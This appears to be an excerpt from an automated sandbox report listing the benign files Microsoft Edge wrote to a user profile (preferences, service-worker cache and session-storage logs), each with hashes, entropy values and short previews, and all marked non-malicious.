                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4ab8e.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.568364574025481
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bHYVq4WPm4fs78F1+UoAYDCx9Tuqh0VfUC9xbog/OVY5qQ7rwO66pctuI:bHYVq4WPm4fs7u1jaJAQQOotD
                                                                                                                                                                                                                                                                                    MD5:33DE49756168DACA4034B274C1401326
                                                                                                                                                                                                                                                                                    SHA1:6EB2200F212C83FD2E1E50F38944606BEA5438AF
                                                                                                                                                                                                                                                                                    SHA-256:0FD31E055BCBE9DB953C2561A3235B34E4E41FAC6D5A68248A4569408DF1ED35
                                                                                                                                                                                                                                                                                    SHA-512:84546116AD508CD382713263AFB6E6AC98F916462042FB35C87748FA99360D1DDCF439635621424B2D9B98F332AF324B6947065D41FF26A14F1944E4AADA73DF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3edfb.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.568364574025481
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bHYVq4WPm4fs78F1+UoAYDCx9Tuqh0VfUC9xbog/OVY5qQ7rwO66pctuI:bHYVq4WPm4fs7u1jaJAQQOotD
                                                                                                                                                                                                                                                                                    MD5:33DE49756168DACA4034B274C1401326
                                                                                                                                                                                                                                                                                    SHA1:6EB2200F212C83FD2E1E50F38944606BEA5438AF
                                                                                                                                                                                                                                                                                    SHA-256:0FD31E055BCBE9DB953C2561A3235B34E4E41FAC6D5A68248A4569408DF1ED35
                                                                                                                                                                                                                                                                                    SHA-512:84546116AD508CD382713263AFB6E6AC98F916462042FB35C87748FA99360D1DDCF439635621424B2D9B98F332AF324B6947065D41FF26A14F1944E4AADA73DF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2394
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.804153295334101
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:F2em6DMrd6DfB+Prdod+6rd6GB+QrditB+C:F1mmMx6Dcxoo6x6oxQ
                                                                                                                                                                                                                                                                                    MD5:B20147E0B3BBF93EFA31FFF371538AE0
                                                                                                                                                                                                                                                                                    SHA1:943F47C99B0E682ED76489F24EAEA5C5EEEAB1DB
                                                                                                                                                                                                                                                                                    SHA-256:DE5D2FB464F4FD931A8266E23E7F4C0E94FED0BB4C5D44E811FEBC68244F672D
                                                                                                                                                                                                                                                                                    SHA-512:48CE74DD5719695B40C371CB7D158E8B9C4B19BA6D72C8FCDD3E2F40E689747C503B61B69CFE84B41BF627589087D2A4CA03207E5569DE07E0825017FDB82BF7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.:...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):299
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.144861904789896
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:P03Eq1923oH+TcwtE/a252KLlpjVq2P923oH+TcwtE/a2ZIFUv:PAEfYeb8xL3jVv4Yeb8J2FUv
                                                                                                                                                                                                                                                                                    MD5:A4ED61E93EA3DA826F72758B4E777357
                                                                                                                                                                                                                                                                                    SHA1:F4D07E61A4C9BFAAE287DD32484B75E6E87AA228
                                                                                                                                                                                                                                                                                    SHA-256:628EBC2EF102B24E059E625EDA7F2084E45E14143208D0DABB7F7F316C01FC99
                                                                                                                                                                                                                                                                                    SHA-512:5D7F327E555CD00FB612C1A721770BDA077BD2A43DE02497F2396D9A54CA11E8F39BA358409F10126DE3D9FF1567F6465C366F10C2431AC02E4CB274B7D2E40E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:58:03.438 1ff0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/23-00:58:03.449 1ff0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):114579
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.579858072451473
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ek3xm5:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dQ
                                                                                                                                                                                                                                                                                    MD5:0144C23EADF9B87F6D72F73CCF888F29
                                                                                                                                                                                                                                                                                    SHA1:26F983D884E086499FA81EB5B0BEE8D6922ADEFA
                                                                                                                                                                                                                                                                                    SHA-256:B14B80EF28F55C5313E99CAD85DC2A0304BD41D7618D00D3B28EC2E5EE980B31
                                                                                                                                                                                                                                                                                    SHA-512:266D2633B1E81CFEA3CD87D689F7AB059E215B5C7E7B75361023D99D9851A98E3E3BB96C54C97FB11FCC45C9DD85BA3514D0F6293ACFFF27E4220DF43B947734
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):189105
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.387232269785005
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:E7ienpI6syRVwYaeRrz4cL//rTvY9vJ9i3LPKHcU5jL6:tUVwYTrPL/jzO9ko6
                                                                                                                                                                                                                                                                                    MD5:A93DD6FD7473CF2E93897470D6CEC368
                                                                                                                                                                                                                                                                                    SHA1:AA3A4D796102C2921ACD45899E9D2BD11452C2BE
                                                                                                                                                                                                                                                                                    SHA-256:09F8DCF7B338C9C0CDC2719081EB45DD26AC2A14977E1B2A1046714C76D088CC
                                                                                                                                                                                                                                                                                    SHA-512:43D7512A75AD3EB891B2F3EEA42173E1F83A25D3457B9C1A3A31C09BD8C0FFB804D6C12A876056567E8F0BB7646034349F615E42CB4ECBE784075DF9D637F540
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0....z3.................;.....x.X........,T.8..`,.....L`.....,T...`......L`......Rcn.=W....exports...Rcv......module....Rc........define....Rb..zS....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....W.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:0\r..m..................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Cwoc9Xl/lYV/lxEstllQGOao:CwoCYWs+GOH
                                                                                                                                                                                                                                                                                    MD5:3E9672D8557707FD05E3E913119B872A
                                                                                                                                                                                                                                                                                    SHA1:0A76C41FE99E92656C196EC80249B9A0569FC763
                                                                                                                                                                                                                                                                                    SHA-256:A77E11997A5031EEE54DAF9DEFBBED38A7CBDDDD6FC74A8838640C562C0E1FBF
                                                                                                                                                                                                                                                                                    SHA-512:A97006BBB9A80377C941619515A67832BFE5E301899808A2389643C16C943E7E1C8E8220FC6B55C52BC89A2745E0DAB2C383D0C2C826F6A09AF69E553C2DC827
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...w8..oy retne.........................X....,....................../.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Cwoc9Xl/lYV/lxEstllQGOao:CwoCYWs+GOH
                                                                                                                                                                                                                                                                                    MD5:3E9672D8557707FD05E3E913119B872A
                                                                                                                                                                                                                                                                                    SHA1:0A76C41FE99E92656C196EC80249B9A0569FC763
                                                                                                                                                                                                                                                                                    SHA-256:A77E11997A5031EEE54DAF9DEFBBED38A7CBDDDD6FC74A8838640C562C0E1FBF
                                                                                                                                                                                                                                                                                    SHA-512:A97006BBB9A80377C941619515A67832BFE5E301899808A2389643C16C943E7E1C8E8220FC6B55C52BC89A2745E0DAB2C383D0C2C826F6A09AF69E553C2DC827
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...w8..oy retne.........................X....,....................../.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4296e.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Cwoc9Xl/lYV/lxEstllQGOao:CwoCYWs+GOH
                                                                                                                                                                                                                                                                                    MD5:3E9672D8557707FD05E3E913119B872A
                                                                                                                                                                                                                                                                                    SHA1:0A76C41FE99E92656C196EC80249B9A0569FC763
                                                                                                                                                                                                                                                                                    SHA-256:A77E11997A5031EEE54DAF9DEFBBED38A7CBDDDD6FC74A8838640C562C0E1FBF
                                                                                                                                                                                                                                                                                    SHA-512:A97006BBB9A80377C941619515A67832BFE5E301899808A2389643C16C943E7E1C8E8220FC6B55C52BC89A2745E0DAB2C383D0C2C826F6A09AF69E553C2DC827
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:@...w8..oy retne.........................X....,....................../.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):6145
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4029316397025458
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:S5U4JPPn0IPma19Xp+/KiPLl9iSr/WhUungyg:iU4JPPn519Xp+iCLl9iSr+u0gyg
                                                                                                                                                                                                                                                                                    MD5:7972E552F4B2614AAABFD89AB0D4F7AC
                                                                                                                                                                                                                                                                                    SHA1:5290EBF49AAB3E55CF9207C0B9A1503BEEED8F31
                                                                                                                                                                                                                                                                                    SHA-256:8F468EAEE30A6E72BF487E02E7D94225FC8CE01FCEFFABBB999C509A6C5F822E
                                                                                                                                                                                                                                                                                    SHA-512:0880AB53234D8DE3935AC30C82269BDB04EF2F253293B139AFA79236748A092E9B61873BD598C46D8C54CF1E64529A459290419CF256B38861A56248D3AC54DD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................$..b................next-map-id.1.Cnamespace-79549177_1a6b_4edf_a588_b328058d668e-https://ntp.msn.com/.0....................map-0-shd_sweeper.-{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.,.1.s.-.r.c.h.o.r.o.,.p.r.g.-.c.a.l.-.h.o.r.o.s.c.o.p.e.,.p.r.g.-.e.h.p.s.b.h.v.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.q.e.n.t.s.i.r.u.t.1.,.p.r.g.-.1.s.w.-.s.a.l.3.u.i.c.p.a.c.,.p.r.g.-.1.s.w.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.c.h.g.s.i.z.e.,.p.r.g.-.1.s.w.-.p.r.g.1.r.e.t.r.y.,.p.r.g.-.1.s.w.-.t.r.d.i.s.c.c.2.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.126092636283
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdW2Iq2P923oH+TcwtrQMxIFUt8VRd6UEYZmw+VRdakwO923oH+TcwtrQMFLJ:D2Iv4YebCFUt8QUH/+k5LYebtJ
                                                                                                                                                                                                                                                                                    MD5:C2CF1A0E1E4069141582FAF82B1D3D55
